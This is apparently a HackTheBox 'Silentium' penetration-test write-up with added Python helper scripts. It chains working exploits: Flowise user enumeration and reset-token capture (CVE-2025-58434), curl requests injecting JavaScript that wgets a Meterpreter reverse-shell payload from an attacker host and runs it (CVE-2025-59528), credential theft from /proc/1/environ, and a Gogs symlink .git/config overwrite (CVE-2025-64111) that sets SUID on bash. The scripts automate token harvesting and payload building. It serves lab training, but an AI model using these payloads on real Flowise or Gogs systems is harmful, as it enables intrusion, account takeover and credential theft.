HTB Machine Silentium: Penetration Test Notes

misaka19008 · published 22 hours ago · 9 views



Target information

IP address: 10.129.212.243 (not a fixed IP address)


Information gathering

ICMP check

PING 10.129.212.243 (10.129.212.243) 56(84) bytes of data.
64 bytes from 10.129.212.243: icmp_seq=1 ttl=63 time=211 ms
64 bytes from 10.129.212.243: icmp_seq=2 ttl=63 time=138 ms
64 bytes from 10.129.212.243: icmp_seq=3 ttl=63 time=226 ms
64 bytes from 10.129.212.243: icmp_seq=4 ttl=63 time=156 ms

--- 10.129.212.243 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3003ms
rtt min/avg/max/mdev = 138.193/182.906/226.352/36.626 ms

Network connectivity between the attacking machine and the target is good. The TTL of 63 is a Linux default of 64 decremented once, which matches the two-hop path (gateway, then target) that the traceroute below shows.

Firewall detection

# Nmap 7.98 scan initiated Sun Apr 12 07:13:08 2026 as: /usr/lib/nmap/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.212.243
Nmap scan report for 10.129.212.243
Host is up (0.26s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE         SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http

# Nmap done at Sun Apr 12 07:13:48 2026 -- 1 IP address (1 host up) scanned in 40.22 seconds

The FIN scan reports two TCP ports (22 and 80) as open|filtered and every other port answered with RST. A FIN scan cannot tell open from filtered, because neither replies, so the target most likely exposes two TCP ports; the full connect scan below confirms it.

Port scanning

TCP port scan results

# Nmap 7.98 scan initiated Sun Apr 12 07:20:21 2026 as: /usr/lib/nmap/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.212.243
Nmap scan report for 10.129.212.243
Host is up (0.23s latency).
Not shown: 65478 filtered tcp ports (no-response), 55 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_  256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://silentium.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   465.22 ms 10.10.16.1
2   209.82 ms 10.129.212.243

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 12 07:21:32 2026 -- 1 IP address (1 host up) scanned in 70.47 seconds

UDP port scan results (open-port list)

# Nmap 7.98 scan initiated Sun Apr 12 07:22:07 2026 as: /usr/lib/nmap/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.212.243
Warning: 10.129.212.243 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.212.243
Host is up (0.49s latency).
All 65535 scanned ports on 10.129.212.243 are in ignored states.
Not shown: 65282 open|filtered udp ports (no-response), 253 closed udp ports (port-unreach)

# Nmap done at Sun Apr 12 07:26:19 2026 -- 1 IP address (1 host up) scanned in 252.52 seconds

UDP service detail scan results

(none: no UDP port answered, so there was nothing to version-scan)

The TCP scan shows the target runs Ubuntu Linux with 22/ssh and 80/http exposed. The http-title line records a redirect to http://silentium.htb/, which, in line with HackTheBox convention, is the machine's main domain; add it to the attack box's /etc/hosts before continuing.


Service probing

SSH service (port 22)

Connect with ssh to see which authentication methods the server offers:

ssh root@silentium.htb

Web application (port 80)

Subdomain enumeration

Before enumerating the web application itself, brute-force virtual hosts against the IP (the address differs from the earlier scans because the machine's IP is not fixed; --hh 178 hides responses of the baseline length 178 and --hc 400 hides bad-request replies):

wfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 70 -u http://10.129.212.252 -H "Host: FUZZ.silentium.htb" --hh 178 --hc 400

This finds the subdomain staging.silentium.htb.

Main site enumeration

Open the home page: http://silentium.htb/

The site is a brochure page for a financial lending company. A directory scan of it turned up nothing useful.

staging site enumeration

Open the home page: http://staging.silentium.htb/

The staging virtual host runs Flowise, a platform for building LLM chat applications. Requesting /api/v1/version returns its version:

The Flowise version is v3.0.5. Searching for known issues turns up an arbitrary password reset vulnerability, CVE-2025-58434, and an authenticated command execution vulnerability, CVE-2025-59528.

The vulnerability descriptions explain the root causes. The password reset flaw exists because the endpoint that handles a password-reset token request returns the generated token directly in its response, so anyone who knows a user's e-mail address can reset that user's password without access to the mailbox. The command execution flaw exists because Flowise passes unfiltered user input from an "add MCP server" request into a code-evaluation function, which gives any authenticated user (or API-key holder) RCE.

The plan is therefore to reset a Flowise user's credentials with CVE-2025-58434 first, then use CVE-2025-59528 for command execution.


Exploitation

Chaining the Flowise vulnerabilities

During service probing we established that the target's Flowise v3.0.5 is affected by CVE-2025-59528 and CVE-2025-58434; now we exploit them.

We do not yet know any Flowise usernames, so we brute-force them with a name wordlist. The forgot-password endpoint answers 201 for a known e-mail address and something else for an unknown one, which is the oracle; the wfuzz parameters follow the request format from the public exploit:

wfuzz -w /usr/share/wordlists/seclists/Usernames/Names/names.txt -t 70 -X POST -H "Content-Type: application/json" -d '{"user":{"email":"FUZZ@silentium.htb"}}' --sc 201 http://staging.silentium.htb/api/v1/account/forgot-password

This finds the user ben@silentium.htb. Click the link in the login box to reach the forgot-password page:

Enter the discovered e-mail address, press F12 to open the developer tools, and switch to the Network tab to watch the HTTP request:

The reset token comes back in the response body. Click the "Change your password here" link and enter the user's e-mail address and the obtained token on the password reset page:

Click Update Password to reset the password, then log in with the new credentials:

Logged in. Go to the API Keys page and view the access key:

The API key is hWp_8jB76zi0VtKSr2d9TfGK1fm6NuNPg1uA-8FsUJc
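The user enumeration and token capture above, as an added Python example (not the page's own tooling). It sends the same forgot-password request and JSON body as the wfuzz command, treats a 201 reply as the known-user signal the writeup relies on, and then collects token-like fields from the reply, since under CVE-2025-58434 the reset token is in that same response. The exact field name Flowise uses is not shown on the page, so the key search is generic, and the demo transport and its "tempToken" field are constructed for offline use.

```python
import json
import urllib.error
import urllib.request

FLOWISE_URL = "http://staging.silentium.htb"          # vhost found above
FORGOT_PATH = "/api/v1/account/forgot-password"      # endpoint from the wfuzz command


def forgot_password_request(email: str) -> urllib.request.Request:
    """Same request the wfuzz line sends, for a single e-mail address."""
    body = json.dumps({"user": {"email": email}}).encode()
    return urllib.request.Request(
        FLOWISE_URL + FORGOT_PATH,
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def http_post(req: urllib.request.Request, timeout: float = 15) -> tuple[int, str]:
    """Send a request and return (status, body); HTTP errors are returned, not raised."""
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode(errors="replace")


def find_tokens(body: str) -> list[str]:
    """Collect string values whose key contains 'token' anywhere in a JSON body.

    Flowise's actual field name is not shown in the writeup; searching by key
    name is an assumption that keeps this independent of it.
    """
    try:
        data = json.loads(body)
    except ValueError:
        return []
    found: list[str] = []

    def walk(node):
        if isinstance(node, dict):
            for key, value in node.items():
                if "token" in key.lower() and isinstance(value, str):
                    found.append(value)
                walk(value)
        elif isinstance(node, list):
            for item in node:
                walk(item)

    walk(data)
    return found


def enumerate_users(names, domain: str, post=http_post) -> list[tuple[str, list[str]]]:
    """Try name@domain for every name; a 201 reply marks a known user and, with
    CVE-2025-58434, also leaks that user's reset token. Returns (email, tokens)."""
    hits = []
    for name in names:
        email = f"{name}@{domain}"
        status, body = post(forgot_password_request(email))
        if status == 201:
            hits.append((email, find_tokens(body)))
    return hits


def demo_post(req: urllib.request.Request) -> tuple[int, str]:
    """Constructed offline transport: a server that knows only ben@silentium.htb
    and leaks a token in its 201 reply. The field name 'tempToken' is made up."""
    email = json.loads(req.data.decode())["user"]["email"]
    if email == "ben@silentium.htb":
        return 201, json.dumps({"user": {"email": email}, "tempToken": "abc123"})
    return 404, json.dumps({"message": "user not found"})


if __name__ == "__main__":
    import sys
    wordlist = sys.argv[1] if len(sys.argv) > 1 else \
        "/usr/share/wordlists/seclists/Usernames/Names/names.txt"
    with open(wordlist) as fh:
        names = [line.strip() for line in fh if line.strip()]
    for email, tokens in enumerate_users(names, "silentium.htb"):
        print(email, tokens)
```

Run it against the target with the names wordlist as the only argument; pass `post=demo_post` to `enumerate_users` to exercise the logic without a network.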

The next step is to execute arbitrary commands through CVE-2025-59528. First generate a Meterpreter payload:

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.10.16.58 LPORT=443 -f elf -o reverse443

Once it is built, start a local SimpleHTTPServer and a Metasploit listener, then send the following requests, based on the vulnerability description, to download and run the payload. The JavaScript passed in mcpServerConfig is carried inside a JSON string, so the double quotes inside it must be escaped as \" (an unescaped copy is invalid JSON and is rejected before it reaches the evaluator):

curl -X POST http://staging.silentium.htb/api/v1/node-load-method/customMCP -H "Content-Type: application/json" -H "Authorization: Bearer hWp_8jB76zi0VtKSr2d9TfGK1fm6NuNPg1uA-8FsUJc" -d '{"loadMethod": "listActions","inputs": {"mcpServerConfig": "({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"wget http://10.10.16.58/reverse443 -O /tmp/reverse443\");return 1;})()})"}}'
curl -X POST http://staging.silentium.htb/api/v1/node-load-method/customMCP -H "Content-Type: application/json" -H "Authorization: Bearer hWp_8jB76zi0VtKSr2d9TfGK1fm6NuNPg1uA-8FsUJc" -d '{"loadMethod": "listActions","inputs": {"mcpServerConfig": "({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"chmod 777 /tmp/reverse443\");return 1;})()})"}}'
curl -X POST http://staging.silentium.htb/api/v1/node-load-method/customMCP -H "Content-Type: application/json" -H "Authorization: Bearer hWp_8jB76zi0VtKSr2d9TfGK1fm6NuNPg1uA-8FsUJc" -d '{"loadMethod": "listActions","inputs": {"mcpServerConfig": "({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"/tmp/reverse443\");return 1;})()})"}}'

Success. The third request does not return while the payload is running, because execSync waits for its child, but the session is already established. Running getuid and sysinfo shows we are root inside a Docker container.

After a moment's thought, run ps to list the container's processes:

The Node.js process has PID 1. Read that process's environment variables (the output is NUL-separated; pipe it through tr '\0' '\n' to make it readable):

cat /proc/1/environ

Two suspicious environment variables appear:

  • SENDER_EMAIL=ben@silentium.htb
  • SMTP_PASSWORD=r04D!!_R4ge

The SMTP password is worth trying against SSH on the host with the matching username:

  • Username: ben
  • Password: r04D!!_R4ge

ssh ben@silentium.htb

Success!!


Privilege escalation

Directory enumeration

After logging in as ben, enumerate the filesystem. /opt contains a subdirectory named gogs:

ls -lA /opt

and there is an Nginx site configuration at /etc/nginx/sites-available/staging-v2-code

That reveals another virtual host: staging-v2-code.dev.silentium.htb. Add it to the attack box's hosts file and open the page:

The virtual host serves Gogs, a self-hosted Git service. Enumerating /opt/gogs finds the server binary /opt/gogs/gogs/gogs; running it reports version v0.13.3.

Searching for known issues finds an authenticated command execution vulnerability, CVE-2025-64111 (advisory "RCE in repository put contents API", gogs/gogs).

We use it to escalate privileges.

CVE-2025-64111 exploitation

During directory enumeration we found Gogs v0.13.3 behind staging-v2-code.dev.silentium.htb, which is affected by the authenticated command execution vulnerability CVE-2025-64111; now we exploit it.

Following the exploit write-up, first register a new user, demo:

After registering, log in and open the user settings page via the avatar in the top right corner:

Back in the SSH session, generate an SSH key pair (recent OpenSSH defaults to ed25519):

ssh-keygen
cat ~/.ssh/id_ed25519.pub

Then click SSH Keys => Add Key and add the public key to Gogs:

Next go to Applications and click Generate New Token to create an access token; save it:

The generated token is 26bc9728c2f268173ced4fad70eacd338dc4b70c

With the prerequisites in place, click the plus sign at the top right and create a repository named vul:

Back in the SSH session, initialise a local repository, add a symlink that points at .git/config, and push it over SSH:

mkdir vul && cd vul
git init
git config user.name "demo"
git config user.email "demo@demo.com"
git remote add origin root@localhost:demo/vul.git
git remote set-url origin ssh://root@localhost/demo/vul.git
ln -s .git/config link
git add .
git commit -m "exploit"
git push -u origin master

The repository now contains the symlink. The contents API writes the uploaded file into Gogs's server-side working copy of the repository and follows the symlink, so a PUT on the path link overwrites that copy's .git/config. The base64 content below is a .git/config whose core.sshCommand is chmod 4755 /bin/bash; git runs sshCommand in place of ssh the next time it talks to the ssh:// remote, and because Gogs evidently runs as root here (the remote is root@localhost), so does the chmod:

curl -X PUT http://staging-v2-code.dev.silentium.htb/api/v1/repos/demo/vul/contents/link -H "Content-Type: application/json" -H "Authorization: token 26bc9728c2f268173ced4fad70eacd338dc4b70c" --data '{"message":"message","committer":{"name":"demo","email":"demo@demo.com"},"content":"W2NvcmVdCglyZXBvc2l0b3J5Zm9ybWF0dmVyc2lvbiA9IDAKCWZpbGVtb2RlID0gdHJ1ZQoJYmFyZSA9IGZhbHNlCglsb2dhbGxyZWZ1cGRhdGVzID0gdHJ1ZQoJaWdub3JlY2FzZSA9IHRydWUKCXByZWNvbXBvc2V1bmljb2RlID0gdHJ1ZQoJc3NoQ29tbWFuZCA9IGNobW9kIDQ3NTUgL2Jpbi9iYXNoCltyZW1vdGUgIm9yaWdpbiJdCgl1cmwgPSBzc2g6Ly9naXRAbG9jYWxob3N0L2RlbW8vdnVsLmdpdAoJZmV0Y2ggPSArcmVmcy9oZWFkcy8qOnJlZnMvcmVtb3Rlcy9vcmlnaW4vKgpbYnJhbmNoICJtYXN0ZXIiXQoJcmVtb3RlID0gb3JpZ2luCgltZXJnZSA9IHJlZnMvaGVhZHMvbWFzdGVy"}'
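What the base64 blob in that request carries, and how to produce one for a different command, as an added Python example (not the page's or the Gogs project's code). It decodes the writeup's own blob, pulls out the core.sshCommand line that git will execute as the Gogs user the next time it contacts the ssh:// remote, and builds a fresh PUT /contents body with the same committer fields. Repository, user and committer values are the writeup's; any other command is a placeholder.

```python
import base64
import json

# The "content" value from the writeup's curl request, verbatim.
WRITEUP_CONTENT_B64 = (
    "W2NvcmVdCglyZXBvc2l0b3J5Zm9ybWF0dmVyc2lvbiA9IDAKCWZpbGVtb2RlID0gdHJ1ZQoJYmFy"
    "ZSA9IGZhbHNlCglsb2dhbGxyZWZ1cGRhdGVzID0gdHJ1ZQoJaWdub3JlY2FzZSA9IHRydWUKCXBy"
    "ZWNvbXBvc2V1bmljb2RlID0gdHJ1ZQoJc3NoQ29tbWFuZCA9IGNobW9kIDQ3NTUgL2Jpbi9iYXNo"
    "CltyZW1vdGUgIm9yaWdpbiJdCgl1cmwgPSBzc2g6Ly9naXRAbG9jYWxob3N0L2RlbW8vdnVsLmdp"
    "dAoJZmV0Y2ggPSArcmVmcy9oZWFkcy8qOnJlZnMvcmVtb3Rlcy9vcmlnaW4vKgpbYnJhbmNoICJt"
    "YXN0ZXIiXQoJcmVtb3RlID0gb3JpZ2luCgltZXJnZSA9IHJlZnMvaGVhZHMvbWFzdGVy"
)


def decode_content(b64: str) -> str:
    """Base64 content field -> the file text that lands in the working copy."""
    return base64.b64decode(b64).decode()


def parse_git_config(text: str) -> dict:
    """Minimal INI-style parser for .git/config: {section: {key: value}}."""
    sections: dict = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        key, sep, value = line.partition("=")
        if sep and current is not None:
            sections[current][key.strip()] = value.strip()
    return sections


def ssh_command_of(config_text: str):
    """core.sshCommand, the program git runs instead of ssh for ssh:// remotes."""
    return parse_git_config(config_text).get("core", {}).get("sshCommand")


def git_config_with_ssh_command(remote_url: str, command: str, branch: str = "master") -> str:
    """A non-bare .git/config equivalent to the writeup's, with core.sshCommand
    set to `command`; git executes it on the next fetch/push to `remote_url`."""
    lines = [
        "[core]",
        "\trepositoryformatversion = 0",
        "\tfilemode = true",
        "\tbare = false",
        "\tlogallrefupdates = true",
        f"\tsshCommand = {command}",
        '[remote "origin"]',
        f"\turl = {remote_url}",
        "\tfetch = +refs/heads/*:refs/remotes/origin/*",
        f'[branch "{branch}"]',
        "\tremote = origin",
        f"\tmerge = refs/heads/{branch}",
    ]
    return "\n".join(lines) + "\n"


def put_contents_body(content: str, name: str = "demo", email: str = "demo@demo.com",
                      message: str = "message") -> str:
    """JSON body for PUT /api/v1/repos/{owner}/{repo}/contents/{path}, matching
    the field layout of the writeup's request."""
    return json.dumps({
        "message": message,
        "committer": {"name": name, "email": email},
        "content": base64.b64encode(content.encode()).decode(),
    })


def decode_body_content(body: str) -> str:
    """Inverse of put_contents_body for the content field."""
    return decode_content(json.loads(body)["content"])


if __name__ == "__main__":
    print(decode_content(WRITEUP_CONTENT_B64))
    print("sshCommand ->", ssh_command_of(decode_content(WRITEUP_CONTENT_B64)))
    fresh = git_config_with_ssh_command("ssh://git@localhost/demo/vul.git", "chmod 4755 /bin/bash")
    print(put_contents_body(fresh))
```

Decoding the blob before sending it is the check to make: the remote URL inside the config must be an ssh:// URL, otherwise git never consults core.sshCommand and nothing runs.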

The SUID bit is now set on /bin/bash (check with ls -l /bin/bash). Start a privileged shell and change root's password. bash -p keeps the effective UID of 0 instead of dropping it; the setuid(0) call then makes the real UID 0 as well, which passwd requires before it will change another account's password:

/bin/bash -p
python3 -c "import os;os.setuid(0);os.setgid(0);os.system('passwd root')"

Finally switch to root:

su -

Privilege escalation complete!!!!


This concludes the engagement against this machine.


Last updated 2026-05-18